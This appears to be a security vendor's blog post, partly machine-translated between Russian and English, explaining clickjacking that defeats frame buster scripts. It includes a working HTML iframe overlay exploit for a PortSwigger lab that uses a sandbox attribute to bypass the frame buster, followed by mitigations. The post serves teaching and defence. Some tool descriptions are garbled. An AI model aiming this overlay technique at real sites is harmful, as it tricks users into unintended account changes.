05 Мар, 2024

Clickjacking with a frame buster script

Clickjacking with a frame buster script

Clickjacking involves tricking users into interacting with unintended elements by overlaying them with legitimate content. A frame buster script, also known as frame busting or frame breaking, is a security mechanism designed to prevent a webpage from being framed or embedded within an iframe on another site.

Кликджекинг:

Описание: Clickjacking, also known as UI redressing, is a web security vulnerability where an attacker tricks a user into clicking on something different from what the user perceives. This is typically achieved by placing invisible or transparent elements over seemingly legitimate clickable elements on a webpage.

Attack Scenario: Attackers may overlay an invisible iframe over a targeted website, tricking users into interacting with elements within the iframe without their knowledge.

Frame Buster Script:

Описание: A frame buster script, also known as frame-breaking script or framekiller script, is a piece of JavaScript code implemented on a webpage to prevent the page from being framed or embedded within an iframe. Its purpose is to defend against clickjacking by breaking out of any frames that attempt to encapsulate the page.

Реализация: The frame buster script typically checks whether the page is the top-level window and, if not, redirects the top-level window to the original page, preventing the page from being displayed within a frame.

Clickjacking with Frame Buster Script:

Attack Description:

An attacker identifies a target website that uses a frame buster script to prevent framing.

The attacker employs various techniques to circumvent or disable the frame buster script, allowing the target site to be framed.

The attacker overlays the framed target site with invisible elements, tricking users into interacting with these elements while interacting with the target site underneath.

Simultaneously, the attacker may inject malicious scripts into the target site, exploiting DOM-Based XSS vulnerabilities.

Example Scenario:

A popular social media site implements a frame buster script to prevent clickjacking.

An attacker identifies and exploits a vulnerability that allows them to disable or bypass the frame buster script.

The attacker then overlays the social media site with invisible elements, tricking users into performing unintended actions.

Malicious scripts are injected through DOM-Based XSS, allowing the attacker to steal user credentials or perform other malicious activities.

Примеры эксплуатации

To better understand the Clickjacking with a frame buster script vulnerability, let’s take a look at one of the labs from PortSwigger, a well-known web security company. This lab demonstrates a Clickjacking with a frame buster script vulnerability.

Log in account

Then go to “My account”

After that you need to change url https://0af9002204c308538175a2d900e70088.web-security-academy.net/my-account?id=wiener Для https://0af9002204c308538175a2d900e70088.web-security-academy.net/[email protected]

As we can see the “Email” filled

Then we going to use this code to create clickjacking

				
					<style>
#target_website {
position: relative;
width: 300px;
height: 600px;
opacity: 0.5;
z-index: 2;
border: none;
}
#decoy_website {
position: absolute;
top: 470px;
left: 125px;
z-index: 1;
}
</style>
<div id="decoy_website">Click me</div>
<iframe id="target_website" sandbox="allow-forms" src="https://0af9002204c308538175a2d900e70088.web-security-academy.net/my-account?email=wiener0@normal-user.net" scrolling="no"></iframe>
				
			

As we can see clickjacking  vulnerability worked.

Scanners that detect vulnerabilities

Burp Suite:

Описание: A web application AMAZON WEB SERVICES tool with features for scanning and analyzing web applications.

OWASP Zed Attack Proxy (ZAP):

Описание: An open-source security testing tool designed to find vulnerabilities in web applications.

Selenium:

Описание: A browser automation tool that can be used for testing web applications, including interactions with iframes.

BeEF (Browser Exploitation Framework):

Описание:ПЕНТЕСТ tool focused on web browsers, allowing for testing against various client-side vulnerabilities.

Clickjacking Tester (Browser Extension):

Описание: A browser extension designed to detect and test for Clickjacking vulnerabilities.

X-Frame-Bypass:

Описание: A tool specifically designed to bypass frame busters and test for Clickjacking vulnerabilities.

Average CVSS score

Assigning a specific Common Vulnerability Scoring System (CVSS) score for “Clickjacking with a Frame Buster Script” can vary based on multiple factors. The CVSS score takes into account various metrics to assess the severity of a vulnerability.

CWE information

Clickjacking (UI Redress, CWE-1021):

Описание: Clickjacking involves tricking a user into interacting with unintended elements by overlaying them with legitimate content.

CWE Identifier: CWE-1021 (UI Redress)

Frame Busting Bypass (CWE-1021):

Описание: Frame busting (frame-breaking) scripts are used to prevent a webpage from being framed or embedded within an iframe. A weakness or bypass in the frame buster can lead to potential Clickjacking vulnerabilities.

CWE Identifier: CWE-1021 (UI Redress)

Conclusion and Mitigation

Clickjacking with a frame buster script represents a scenario where an attacker attempts to bypass or disable frame buster scripts to carry out Clickjacking attacks. This combination poses a significant threat to web applications, potentially leading to unauthorized actions performed by users unknowingly interacting with deceptive elements.

Mitigation Strategies:

Secure Frame Busting Implementation:

Ensure that frame buster scripts are securely implemented, resistant to bypass attempts, and effectively prevent the embedding of your web application within iframes on malicious sites.

Политика безопасности контента (CSP):

Implement a robust Content Security Policy to control the sources from which resources, including scripts, can be loaded. This helps mitigate the risk of unauthorized script execution.

Регулярные аудиты безопасности:

Conduct regular аудиты безопасности, including automated and manual testing, to identify and address vulnerabilities in your web application. Pay specific attention to Clickjacking and frame buster vulnerabilities.

Input Validation and Output Encoding:

Implement strict input validation to ensure that user input is sanitized and adheres to expected formats.

Apply output encoding to sanitize user inputs before displaying them in the browser, preventing the execution of malicious scripts.

Update and Patching:

Keep all software components, including web servers, frameworks, and libraries, up to date with the latest security patches to address known vulnerabilities, including those related to Clickjacking and frame busting.

Security Awareness Training:

Educate developers, administrators, and users about the risks associated with Clickjacking and the importance of frame buster scripts in preventing unauthorized embedding.

Monitoring and Incident Response:

Implement monitoring mechanisms to detect anomalous activities and potential attacks. Have an incident response plan in place to respond promptly to security incidents related to Clickjacking.

Defense-in-Depth:

Implement a defense-in-depth strategy with multiple layers of security controls. This can include network-level controls, server-side controls, and client-side controls to enhance overall security.

Другие Услуги

Готовы к безопасности?

Связаться с нами